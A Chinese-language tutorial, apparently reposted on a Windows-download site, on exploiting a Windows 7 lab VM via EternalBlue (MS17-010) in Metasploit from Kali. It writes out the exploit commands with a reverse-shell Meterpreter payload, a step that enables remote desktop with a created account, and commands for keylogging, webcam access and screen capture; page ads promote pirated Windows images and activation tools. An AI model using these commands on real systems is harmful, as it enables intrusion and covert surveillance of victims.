番茄系統(tǒng)家園 - 免費(fèi)重裝系統(tǒng)!簡(jiǎn)單裝系統(tǒng),人人都是裝機(jī)大師!
當(dāng)前位置:首頁(yè)>Win7資訊 > kali從入門到銀手鐲 安裝Kali

kali從入門到銀手鐲 安裝Kali

來(lái)源:番茄系統(tǒng)家園瀏覽:時(shí)間:2021-08-20 19:30:12

kali从入门到银手镯 安装Kali

现在很多用户还在使用Win7系统,虽然我个人也非常喜欢Win7,也承认这是一款非常经典的系统。但是Win7已经在今年1月份彻底停止了支持,也就是说永远也不会得到安全更新和补丁修复了。这对用户来说是极大的危险,如果有条件的话,还是请使用最新版的,并及时更新安全补丁,保护电脑。

今天就来看看如何利用Kali来对Win7进行渗透。这里使用的工具是大名鼎鼎的,集成了大量漏洞渗透工具。其中自然有臭名昭著的永恒之蓝工具,它利用了系统的SMB漏洞,漏洞编号是MS17-010。具体原理其实我也不清楚,但是大家只要知道这些漏洞非常危险就可以了。

准备工作

准备工作很简单,一个Win7虚拟机和一个Kali虚拟机即可。为了让Kali能够成功渗透,Win7系统需要关闭防火墙。

扫描漏洞

首先在Kali里启动框架。

启动成功之后,应该会进入工具的命令行中,提示符为msf5。

然后使用扫描工具扫描ms10-010漏洞,填写Win7虚拟机的IP地址。

()setRHOSTS192.168.229.129msf5auxiliary(scanner/smb/smb_ms17_010)exploit

注意工具的运行结果,如果出现了类似绿框中的输出,那么就说明漏洞扫描成功,可以进行下一步的渗透工作了。如果Win7防火墙是开启的,是无法扫描到漏洞的。这也从另一个侧面来证明防火墙的保护作用。

渗透系统

通过扫描证实了Win7系统中存在漏洞,下一步自然是通过对应的渗透工具进行渗透。其中RHOSTS是远程IP,也就是Win7的IP地址,而LHOSTS是本地Kali系统的IP地址。

msf5auxiliary(scanner/smb/smb_ms17_010)useexploit/windows/smb/ms17_010_eternalbluemsf5exploit(windows/smb/ms17_010_eternalblue)setRHOSTS192.168.229.129msf5exploit(windows/smb/ms17_010_eternalblue)setpayloadwindows/x64/meterpreter/reverse_tcpmsf5exploit(windows/smb/ms17_010_eternalblue)setLHOST192.168.229.131msf5exploit(windows/smb/ms17_010_eternalblue)exploit

稍等片刻,如果渗透成功,那么就会出现meterpreter提示符。这时候可以输入getuid命令查看一下当前系统的用户。

开启远程桌面

渗透成功之后,就可以使用随心所欲的进行各种操作了。如果想要简单一点,可以开启远程桌面,直接控制目标电脑。开启RDP的时候需要创建一个用户。

meterpreterrunpost/windows/manage/enable_rdpUSERNAME=testPASSWORD=123456

然后在Kali中打开一个新的终端,输入命令开启远程桌面。

rdesktop192.168.229.129

然后输入上面设置的用户名和密码即可连接到目标计算机。

当然,这种方法的问题就是因为Windows系统是单用户的系统,当前登录的用户会看到远程桌面的登录提示,从而暴露渗透者。

后台监听

其实如果渗透成功,进入了meterpreter提示符状态的话,也不需要这么麻烦。因为meterpreter自带了很多命令,包括上传文件、执行程序、监听键盘鼠标摄像头等等,完全足以获取目标用户的任何信息。

screenshot命令可以获取当前的系统截图。

upload命令可以上传文件,这里我直接把刚刚的屏幕截图上传上去了。上传的目标位置在C:\Windows\System32里。

webcam_stream命令可以打开目标计算机的摄像头。

screenshare可以实时查看用户的当前屏幕内容。

keyscan命令可以监听用户的键盘操作。

最后是execute命令可以执行目标计算机上的任意程序。

以上这些命令配合使用,即可完成整个渗透过程,从方方面面获取目标用户的信息。

当然,通过本篇内容,相比大家也明白了系统漏洞对用户的危害有多大了吧。为了尽可能的减少漏洞对我们的影响,我推荐大家永远使用最新版的操作系统并及时更新安全补丁,不要关闭更新和防火墙,安装并确保杀毒软件正常运行,不运行奇怪的程序。这样可以很大程度上避免不法分子黑入我们的电脑。

相关阅读

  • win7启动windows防火墙失败提示错误0x8007042c的三种解决办法
  • metasploit 渗透win7
  • kali从入门到银手镯 安装Kali
  • 推薦系統(tǒng)

    • 雨林木風(fēng) winxp下載 純凈版 永久激活 winxp ghost系統(tǒng) sp3 系統(tǒng)下載

      雨林木風(fēng) winxp下載 純凈版 永久激活 winxp ghost系統(tǒng) sp3 系統(tǒng)下載64位
      系統(tǒng)大?。?/em>0MB系統(tǒng)類型:WinXP

      雨林木風(fēng)在系統(tǒng)方面技術(shù)積累雄厚深耕多年,打造了國(guó)內(nèi)重裝系統(tǒng)行業(yè)知名品牌,雨林木風(fēng)WindowsXP其系統(tǒng)口碑得到許多人認(rèn)可,積累了廣大的用戶群體,是一款穩(wěn)定流暢的系統(tǒng),雨林木風(fēng) winxp下載 純凈版 永久激活 winxp ghost系統(tǒng) sp3 系統(tǒng)下載,有需要的朋友速度下載吧。

      系統(tǒng)等級(jí):
      進(jìn)入下載 >
    • 蘿卜家園win7純凈版 ghost系統(tǒng)下載 x64 聯(lián)想電腦專用

      蘿卜家園win7純凈版 ghost系統(tǒng)下載 x64 聯(lián)想電腦專用64位
      系統(tǒng)大?。?/em>0MB系統(tǒng)類型:Win7

      蘿卜家園win7純凈版是款非常純凈的win7系統(tǒng),此版本優(yōu)化更新了大量的驅(qū)動(dòng),幫助用戶們進(jìn)行舒適的使用,更加的適合家庭辦公的使用,方便用戶,有需要的用戶們快來(lái)下載安裝吧。

      系統(tǒng)等級(jí):
      進(jìn)入下載 >
    • 雨林木風(fēng)xp系統(tǒng) xp系統(tǒng)純凈版 winXP ghost xp sp3 純凈版系統(tǒng)下載

      雨林木風(fēng)xp系統(tǒng) xp系統(tǒng)純凈版 winXP ghost xp sp3 純凈版系統(tǒng)下載64位
      系統(tǒng)大?。?/em>1.01GB系統(tǒng)類型:WinXP

      雨林木風(fēng)xp系統(tǒng) xp系統(tǒng)純凈版 winXP ghost xp sp3 純凈版系統(tǒng)下載,雨林木風(fēng)WinXP系統(tǒng)技術(shù)積累雄厚深耕多年,采用了新的系統(tǒng)功能和硬件驅(qū)動(dòng),可以更好的發(fā)揮系統(tǒng)的性能,優(yōu)化了系統(tǒng)、驅(qū)動(dòng)對(duì)硬件的加速,加固了系統(tǒng)安全策略,運(yùn)行環(huán)境安全可靠穩(wěn)定。

      系統(tǒng)等級(jí):
      進(jìn)入下載 >
    • 蘿卜家園win10企業(yè)版 免激活密鑰 激活工具 V2023 X64位系統(tǒng)下載

      蘿卜家園win10企業(yè)版 免激活密鑰 激活工具 V2023 X64位系統(tǒng)下載64位
      系統(tǒng)大?。?/em>0MB系統(tǒng)類型:Win10

      蘿卜家園在系統(tǒng)方面技術(shù)積累雄厚深耕多年,打造了國(guó)內(nèi)重裝系統(tǒng)行業(yè)的蘿卜家園品牌,(win10企業(yè)版,win10 ghost,win10鏡像),蘿卜家園win10企業(yè)版 免激活密鑰 激活工具 ghost鏡像 X64位系統(tǒng)下載,其系統(tǒng)口碑得到許多人認(rèn)可,積累了廣大的用戶群體,蘿卜家園win10純凈版是一款穩(wěn)定流暢的系統(tǒng),一直以來(lái)都以用戶為中心,是由蘿卜家園win10團(tuán)隊(duì)推出的蘿卜家園

      系統(tǒng)等級(jí):
      進(jìn)入下載 >
    • 蘿卜家園windows10游戲版 win10游戲?qū)I(yè)版 V2023 X64位系統(tǒng)下載

      蘿卜家園windows10游戲版 win10游戲?qū)I(yè)版 V2023 X64位系統(tǒng)下載64位
      系統(tǒng)大小:0MB系統(tǒng)類型:Win10

      蘿卜家園windows10游戲版 win10游戲?qū)I(yè)版 ghost X64位 系統(tǒng)下載,蘿卜家園在系統(tǒng)方面技術(shù)積累雄厚深耕多年,打造了國(guó)內(nèi)重裝系統(tǒng)行業(yè)的蘿卜家園品牌,其系統(tǒng)口碑得到許多人認(rèn)可,積累了廣大的用戶群體,蘿卜家園win10純凈版是一款穩(wěn)定流暢的系統(tǒng),一直以來(lái)都以用戶為中心,是由蘿卜家園win10團(tuán)隊(duì)推出的蘿卜家園win10國(guó)內(nèi)鏡像版,基于國(guó)內(nèi)用戶的習(xí)慣,做

      系統(tǒng)等級(jí):
      進(jìn)入下載 >
    • windows11下載 蘿卜家園win11專業(yè)版 X64位 V2023官網(wǎng)下載

      windows11下載 蘿卜家園win11專業(yè)版 X64位 V2023官網(wǎng)下載64位
      系統(tǒng)大?。?/em>0MB系統(tǒng)類型:Win11

      蘿卜家園在系統(tǒng)方面技術(shù)積累雄厚深耕多年,windows11下載 蘿卜家園win11專業(yè)版 X64位 官網(wǎng)正式版可以更好的發(fā)揮系統(tǒng)的性能,優(yōu)化了系統(tǒng)、驅(qū)動(dòng)對(duì)硬件的加速,使得軟件在WINDOWS11系統(tǒng)中運(yùn)行得更加流暢,加固了系統(tǒng)安全策略,WINDOWS11系統(tǒng)在家用辦公上跑分表現(xiàn)都是非常優(yōu)秀,完美的兼容各種硬件和軟件,運(yùn)行環(huán)境安全可靠穩(wěn)定。

      系統(tǒng)等級(jí):
      進(jìn)入下載 >

    熱門系統(tǒng)